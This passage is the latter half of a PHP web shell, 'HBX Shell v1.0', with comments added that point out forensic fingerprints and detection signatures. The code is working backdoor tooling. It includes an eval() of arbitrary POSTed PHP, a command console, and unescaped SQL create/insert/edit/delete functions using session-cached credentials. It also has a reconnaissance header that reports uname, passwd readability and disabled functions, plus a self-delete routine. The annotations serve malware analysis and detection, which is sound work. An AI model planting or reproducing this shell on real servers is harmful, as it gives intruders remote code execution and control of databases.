- mysql_query("DELETE FROM $_POST[db].$_POST[tbl] WHERE $_POST[row]='$_POST[v]'") or die(mysql_error());
- echo "<center><font color='#00FF00'>Deleted row successfully.</font><br /></center>";
- mysql_view_dbs();
- }
- }
- }
- // CREATE DATABASE $_POST['db'], or (when tbl= is present) CREATE TABLE db.tbl with a single placeholder
- // TEXT column named TEMPORARY. Forensic note: a table whose only column is `TEMPORARY` is a fingerprint
- // of this shell having created it. Identifiers are interpolated unescaped.
- function sql_create() {
- extract($_SESSION);
- if(@$conn=mysql_connect($host,$user,$pass)) {
- if(!isset($_POST['tbl'])) {
- mysql_query("CREATE DATABASE $_POST[db]") or die(mysql_error());
- echo "<center><font color='#00FF00'>Created database $_POST[db] successfully.</font><br /></center>";
- mysql_view_dbs();
- } else {
- mysql_query("CREATE TABLE $_POST[db].$_POST[tbl] (`TEMPORARY` TEXT NOT NULL)") or die(mysql_error());
- echo "<center><font color='#00FF00'>Created table $_POST[db].$_POST[tbl] successfully.</font><br /></center>";
- mysql_view_dbs();
- }
- }
- }
- // Row insertion. Without update=1 it renders one text input per column of db.tbl; with update=1 it takes
- // every POST field whose name matches a column of the table and builds a single-quoted INSERT from them.
- // Values are interpolated unescaped, so the INSERT is only as well-formed as the operator's input.
- function sql_insert() {
- echo "<center><form id='vals'>";
- extract($_SESSION);
- if(@$conn=mysql_connect($host,$user,$pass)) {
- $cols=array();
- $query=mysql_query("SHOW COLUMNS FROM $_POST[db].$_POST[tbl]");
- while($col=mysql_fetch_array($query)) $cols[]=$col['Field'];
- if(!isset($_POST['update'])) {
- // Hidden input (column name) followed by the value input; sendRequest option 'insert' pairs them up.
- for($i=0;$i<count($cols);$i++) {
- echo "<input type='hidden' value='$cols[$i]'>
- $cols[$i]: <input type='text'><br />";
- }
- echo "</form><br /><a href='#' onClick=\"sendRequest('insert&db=$_POST[db]&tbl=$_POST[tbl]','insert')\">[ Insert ]</a>";
- } else {
- $fields=array();
- $rows=array();
- // POST keys that collide with real column names (e.g. a column called 's', 'db' or 'tbl') are picked up too.
- foreach($_POST as $key=>$value) {
- if(in_array($key,$cols)) {
- $fields[]="'".$value."'";
- $rows[]="`".$key."`";
- }
- }
- $vals=implode(",",$fields);
- $keys=implode(",",$rows);
- mysql_query("INSERT INTO $_POST[db].$_POST[tbl] ($keys) VALUES ($vals)") or die(mysql_error());
- echo "Inserted row successfully.";
- }
- }
- echo "</center>";
- mysql_view_dbs();
- }
- // Row editing. Without update=1 it shows the matching rows (WHERE <row>='<v>') as editable inputs; with
- // update=1 it builds an UPDATE from the POST fields that match column names and executes it.
- // The UPDATE is assembled with a " SET " prefix per column, so the generated statement is only syntactically
- // valid when exactly one column is submitted. The statement is echoed to the operator before execution.
- function sql_edit() {
- $cols=array();
- echo "<center>";
- extract($_SESSION);
- if(@$conn=mysql_connect($host,$user,$pass)) {
- if($_POST['update']!=1) {
- $query=mysql_query("SHOW COLUMNS FROM $_POST[db].$_POST[tbl]") or die(mysql_error());
- while($col=mysql_fetch_array($query)) $cols[]=$col['Field'];
- $query=mysql_query("SELECT * FROM $_POST[db].$_POST[tbl] WHERE $_POST[row]='$_POST[v]'") or die(mysql_error());
- if(mysql_num_rows($query)>0) {
- echo "<form id='sqlvals'>";
- while($row=mysql_fetch_array($query)) {
- for($i=0;$i<count($cols);$i++)
- echo "<input type='hidden' value='$cols[$i]'>$cols[$i]: <input type='text' value='$row[$i]'><br />";
- }
- echo "</form><a href='#' onClick=\"sendRequest('edit&db=$_POST[db]&tbl=$_POST[tbl]&row='+encodeURIComponent('$_POST[row]')+'&v='+encodeURIComponent('$_POST[v]')+'','sqlsave')\">[ Save ]</a>";
- } else {echo "MySQL returned 0 results.";}
- } else {
- $vals=array();
- $keys=array();
- $query=mysql_query("SHOW COLUMNS FROM $_POST[db].$_POST[tbl]");
- while($col=mysql_fetch_array($query)) $cols[]=$col['Field'];
- $update="UPDATE $_POST[db].$_POST[tbl]";
- foreach($_POST as $k=>$v) {
- if(in_array($k,$cols)) {
- $vals[]=$v;
- $keys[]=$k;
- }
- }
- for($j=0;$j<count($vals);$j++) {
- if($j==count($vals)-1) {$update.=" SET `$keys[$j]`='$vals[$j]' WHERE $_POST[row]='$_POST[v]'"; break;}
- $update.=" SET `$keys[$j]`='$vals[$j]',";
- }
- echo $update."<br />";
- mysql_query($update) or die(mysql_error());
- echo "Updated row successfully!<br />";
- }
- } else {echo "<font color='red'>Warning: Failed to connect to SQL server</font>";}
- echo"</center>";
- mysql_view_dbs();
- }
- // Clears the cached credentials and destroys the PHP session, then shows the login form again.
- function sql_end_session() {
- $_SESSION=array();
- session_destroy();
- echo "<center><font color='#00FF00'>Logged out from SQL</font></center><br />";
- sql_login();
- }
- // Executes an arbitrary SQL statement with the cached credentials and reports the affected-row count.
- // Result sets are not displayed, so SELECTs only show "Affected rows: -1"/"0"; the value here is in
- // data-changing statements. Errors die() with mysql_error(), which leaks server error text to the operator.
- function execute_query($query) {
- extract($_SESSION);
- if(@$conn=mysql_connect($host,$user,$pass)) {
- mysql_query($query) or die(mysql_error());
- $affected=mysql_affected_rows();
- echo "Query executed. Affected rows: $affected";
- }
- }
- //End SQL functions
- // Unfinished stub: builds a regex intended to spot include()/require() of $_GET/$_POST input in other
- // scripts, but it is never used and the function is never called.
- function find_exploits() {
- $exploits=array("File inclusion"=>"/(include|include_once|require|require_once)\(\\$_[GP].*{2,3}\[/");
- }
- // Arbitrary PHP code execution: eval() of stripslashes($_POST['e']). The code runs in-process with the
- // web server's privileges and is not subject to disable_functions (only function calls inside it are).
- // Without e= it renders the editor UI. Detection: POST bodies containing "s=eval&e=".
- function post_eval() {
- if(isset($_POST['e'])) {
- echo eval(stripslashes($_POST['e']));
- } else {
- echo "<textarea id='eval_out' style='width: 100%; display: none;' rows='10'>//Don't include PHP tags</textarea><br /><textarea id='eval' style='width: 100%' rows='10'>//Don't include PHP tags</textarea><br /><center><a href='#' onClick=\"sendRequest('eval','eval')\">[ Eval ]</a>";
- }
- }
- // Renders the command console UI; Enter in #cmd_in posts 's=exec&cmd=<command>' (see checkKey()).
- function console() {
- echo "<div id='cmd'><input type='text' style='width: 100%' onKeyDown=\"checkKey(event,'exec')\"id='cmd_in'><br /><textarea id='cmd_out' style='width: 100%;' rows='20'></textarea></div>";
- }
- // Self-removal after a confirmation click (kill&dokill=1). The unlink() target is the script's basename
- // relative to the current working directory, so it only succeeds when cwd is the script's directory.
- // Nothing else is cleaned up: the PHP session file (with any cached SQL credentials), web-server logs and
- // any files written via write_contents()/move_* remain for forensic recovery.
- function kill_shell() {
- if(!isset($_POST['dokill'])) {
- echo "<center><h1><a href='#' onClick=\"sendRequest('kill&dokill=1')\">[ Confirm kill ]</a></h1></center>";
- } else {
- // The author handle in this string is another grep-able indicator for the family.
- if(unlink(basename($_SERVER['PHP_SELF']))) echo "<center>Thanks for using HBX shell! - HomicidalMortician</center>";
- else echo "<center><font color='red'>Warning: Failed to delete shell</font></center>";
- }
- }
- ?>
- <html>
- <head>
- <title>HBX Shell v1.0 | BETA</title>
- <?php
- // Page chrome for the initial (non-XHR) GET only. The <title> above ("HBX Shell v1.0 | BETA") is a simple
- // content signature for this family. The block below just interpolates the $shell theme into a stylesheet.
- echo "
- <style>
- body {
- background-color: $shell[Background];
- font-size: 12px;
- color: $shell[Primary_Color];
- }
- a {
- text-decoration: none;
- color: $shell[Link_Color];
- }
- td {
- border-color: $shell[Border];
- }
- a:hover {
- color: $shell[Hover];
- }
- input {
- background-color: $shell[Input_BG];
- color: $shell[Input_Color];
- border: 1px solid $shell[Input_Border];
- }
- textarea {
- background-color: $shell[Textarea_BG];
- color: $shell[Textarea_Color];
- font-family: $shell[Textarea_Font];
- border: 1px solid $shell[Textarea_Border];
- }
- select {
- background-color: #222222;
- color: #3388ff;
- }
- #header {
- font-size: 12px;
- background-color: #000000;
- padding-left: 2px;
- color: $shell[Header_Color];
- font-family: $shell[Header_Font]
- }
- #browse {
- background-color: #000000;
- color: #FFFFFF;
- border-bottom: 1px solid $shell[Border];
- text-align: center;
- padding-bottom: 5px;
- }
- #browse a {
- color: #3388ff;
- text-decoration: none;
- padding-left: 30px;
- font-size: 12px;
- font-family: Arial, Helvetica, sans-serif;
- }
- #browse a:hover {
- color: #00FF00;
- text-decoration: underline;
- }
- #shell {
- font-family: $shell[Font];
- border-bottom: 1px solid $shell[Border];
- font-size: 12px;
- padding-bottom: 20px;
- background-color: #000000;
- }
- #shell td {
- padding-right: 10px;
- font-size: 14px;
- }
- #shell tr:hover {
- background-color: #333333;
- }
- #back {
- float: right;
- }
- #back a{
- font-size: 10px;
- }
- .info td {
- padding-right: 5px;
- }
- #cmd textarea {
- background-color: $shell[CMD_BG];
- color: $shell[CMD_COLOR];
- font-family: $shell[CMD_FONT];
- border: 1px solid $shell[CMD_BORDER];
- }
- #cmd input {
- background-color: $shell[CMD_BG];
- color: $shell[CMD_COLOR];
- border: 1px solid $shell[CMD_BORDER];
- }
- </style>"; ?>
- <script>
- // Client side of the shell. Every action is an XMLHttpRequest POST to the same URL ("?") with an
- // application/x-www-form-urlencoded body that always begins with "s=<action>" -- a stable network signature.
- var m_history=[];
- var current=0;
- var sz=0;
- // Keeps only the last request and renders it as a [ Back ] link.
- function history_back(last) {
- m_history=[last];
- document.getElementById("back").innerHTML="<a href='#' onClick=\"sendRequest('"+m_history[0]+"')\">[ Back ]</a>";
- }
- // Toggles an element's display between none and block.
- function show(id) {
- var opt=document.getElementById(id).style.display;
- if(opt=='none') document.getElementById(id).style.display='block';
- else document.getElementById(id).style.display='none';
- }
- // Enter-key handler for the console, create-database/table and SQL query inputs.
- // Only the SQL query value is URL-encoded; the command string is appended raw.
- function checkKey(e,req) {
- var request='';
- if(window.event) key=e.keyCode;
- else if(e.which) key=e.which;
- if(key==13) {
- if(req=='exec') {
- req+='&cmd='+document.getElementById('cmd_in').value;
- sendRequest(req,'cmd');
- }
- else if(req=='create') {
- req+="&db="+document.getElementById('new_database').value;
- sendRequest(req);
- }
- else if(req=='createtbl') {
- req="create";
- req+="&db="+document.getElementById('sql_db').value+"&tbl="+document.getElementById('new_database').value;
- sendRequest(req);
- } else if(req=='sql_query') {
- req="query&q="+encodeURIComponent(document.getElementById('sql_in').value);
- sendRequest(req,'sqlQuery');
- } else {
- sendRequest(req);
- }
- }
- }
- // Replaces the main panel with a one-field prompt for rename/chmod/move; params is the target path,
- // inserted into the markup and the onClick string without escaping.
- function loadInput(input,params) {
- if(input=='rename') {
- document.getElementById('shell').innerHTML="Renaming file "+params+"<br /><input type='text' value='' id='rnfile'> <a href='#' onClick=\"sendRequest('rename&file="+params+"','rename')\">[ Rename ]</a>";
- }
- if(input=='chmod') {
- document.getElementById('shell').innerHTML="Changing perms for "+params+"<br /><input type='text' value='666' id='chfile'> <a href='#' onClick=\"sendRequest('chmod&file="+params+"','chmod')\">[ Chmod ]</a>";
- }
- if(input=='move') {
- document.getElementById('shell').innerHTML="Move file "+params+"<br /> to location: <input style='width: 500px' type='text' value='"+params+"' id='mvfile'> <a href='#' onClick=\"sendRequest('mv&file="+params+"','mvfile')\">[ Move ]</a>";
- }
- }
- // Builds the POST body "s=<request>[&extra fields chosen by option]" and swaps the response into the page.
- // option selects which form/input values are appended and which element receives the response.
- function sendRequest(request,option) {
- url_req='';
- var xmlHTTP=1;
- if(window.XMLHttpRequest) xmlHTTP=new XMLHttpRequest();
- else if(window.ActiveXObject) xmlHTTP=new ActiveXObject('Microsoft.XMLHTTP');
- else alert('Get a new browser.');
- url_req='s='+request;
- // 'sqlsave': the #sqlvals form alternates hidden column-name inputs and value inputs; pair them as key=value.
- if(option=='sqlsave') {
- var str='';
- var elem=document.getElementById('sqlvals').elements;
- for(var i=0;i<elem.length;i++) {
- if(i%2==0)
- str+="&"+encodeURIComponent(elem[i].value)+"=";
- else
- str+=encodeURIComponent(elem[i].value);
- }
- str+="&update=1";
- url_req+=str;
- }
- // 'save': file editor contents -> data= (the only file-related field that is URL-encoded).
- if(option=='save') {
- data=encodeURIComponent(document.getElementById('file').value)
- url_req+="&data="+data;
- }
- if(option=='rename') {
- url_req+="&rname="+document.getElementById('rnfile').value;
- }
- if(option=='chmod') {
- url_req+="&mod="+document.getElementById('chfile').value;
- }
- if(option=='mvfile') {
- url_req+="&location="+document.getElementById('mvfile').value;
- }
- if(option=='eval') {
- url_req+="&e="+encodeURIComponent(document.getElementById('eval').value);
- }
- // 'sqllogin': database credentials travel in the POST body in clear text (only the password is encoded).
- if(option=='sqllogin') {
- url_req+="&host="+document.getElementById('sql_host').value+"&user="+document.getElementById('sql_user').value+"&pass="+encodeURIComponent(document.getElementById('sql_pass').value); //For passwords with pesky post characters.
- }
- if(option=='insert') {
- var str='';
- var elem=document.getElementById('vals').elements;
- for(var i=0;i<elem.length;i++) {
- if(i%2==0)
- str+="&"+escape(elem[i].value)+"=";
- else
- str+=escape(elem[i].value);
- }
- str+="&update=1";
- url_req+=str;
- }
- xmlHTTP.open('POST','?');
- xmlHTTP.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
- xmlHTTP.send(url_req);
- // Response routing: command output -> #cmd_out, eval output -> #eval_out, query result -> #sql_out,
- // everything else replaces the #shell panel's innerHTML.
- xmlHTTP.onreadystatechange=function() {
- if(xmlHTTP.readyState==4) {
- history_back(request);
- if(option=='cmd') {
- document.getElementById('cmd_in').value='Executing...';
- document.getElementById('cmd_out').innerHTML=xmlHTTP.responseText;
- document.getElementById('cmd_in').value='';
- }
- else if(option=='eval') {
- document.getElementById('eval_out').style.display='block';
- document.getElementById('eval_out').value=xmlHTTP.responseText;
- }
- else if(option=='sqlQuery') {
- document.getElementById('sql_out').style.display='block';
- document.getElementById('sql_in').value='Executing query...';
- document.getElementById('sql_out').value=xmlHTTP.responseText;
- document.getElementById('sql_in').value='';
- }
- else {
- document.getElementById('shell').innerHTML=xmlHTTP.responseText;
- }
- }
- }
- }
- </script>
- </head>
- <body>
- <?php
- // Initial page body: the reconnaissance header (note that "Local" is the operator's own IP and reverse
- // DNS, so a cached copy of this page identifies the operator), the action menu, and the #shell panel
- // which immediately loads the directory listing via sendRequest('view'). The "Quick Commands" / "Tools"
- // selects and the upload/download/enter/edit rows at the bottom have no handlers -- they are placeholder UI.
- echo "
- <div id='header'>
- Shell: <font color='#737a85'><b>$location</b></font><br />
- Server: <font color='#ff4422'>$remote_addr ($remote_host)</font><br />
- Local: <font color='#737a85'><b>$local_addr ($local_host)</b></font><br />
- Open_BaseDir: $open_basedir<br />
- Safe Mode: $safe_mode<br />
- MySQL: $mysql_on<br />
- Disabled functions: $disabled_functions<br />
- Shell status: <u><font color='#ff4422'>Viewing files</font></u><br />
- <div id='info' style='display: none;'>
- Disk: $disk_free of $disk_space<br />
- Software: $software<br />
- PHP Version: $php_ver<br />
- Uname: $uname<br />
- Read passwd: $read_passwd<br />
- cURL: $curl_on<br />
- Remote includes: $includes<br />
- </div>
- <a href='#' onClick=\"show('info')\">[ Show/Hide More Information ]</a>
- <br /><br />
- </div>
- <div id='browse'>
- <a href='#' onClick=\"sendRequest('view')\">[ Files ]</a>
- <a href='#' onClick=\"sendRequest('cmd')\">[ Console ]</a>
- <a href='#' onClick=\"sendRequest('eval')\">[ Eval ]</a>
- <a href='#' onClick=\"sendRequest('sql')\">[ MySQL ]</a>
- <a href='#' onClick=\"sendRequest('kill')\">[ Kill Shell ]</a>
- </div>
- <div id='back'></div>
- <br />
- <br />
- <div id='shell'>
- <script>sendRequest('view')</script>
- </div><br /><br />
- <table width='100%' style='font-size: 12px; text-align: center; margin: auto;' cols='2' cellpadding='5'>
- <tr><td colspan='2'>[ Execute CMD ]</td></tr>
- <tr><td colspan='2'><input type='text' value='whoami' style='width: 75%'></td></tr>
- <tr><td>[ Quick Commands ]</td><td>[ Tools ]</td></tr>
- <tr><td><select>
- <option name=''>Select a command</option>
- <option name='configs'>Current directory</option>
- <option name='sql'>Open ports</option>
- </select>
- </td>
- <td><select>
- <option name=''>Select a tool</option>
- <option name=''>---------------------------------------------------------------------</option>
- <option name='configs'>Find configs</option>
- <option name='sql'>Find SQL files</option>
- <option name='sql'>Find writable files</option>
- <option name='sql'>Find writable dirs</option>
- <option name='sql'>---------------------------------------------------------------------</option>
- <option name='sql'>Retrieve list of enumerated users</option>
- <option name='sql'>Dump tables and columns (schema)</option>
- </select>
- </td></tr>
- <tr><td>[ Upload file ]</td><td>[ Download file ]</td></tr>
- <tr><td>[ Enter directory ]</td><td>[ Edit file ]</td></tr>
- </table>
- </body>
- </html>";
- // Flush the buffer opened by ob_start() at the top of the file.
- ob_end_flush();
- ?>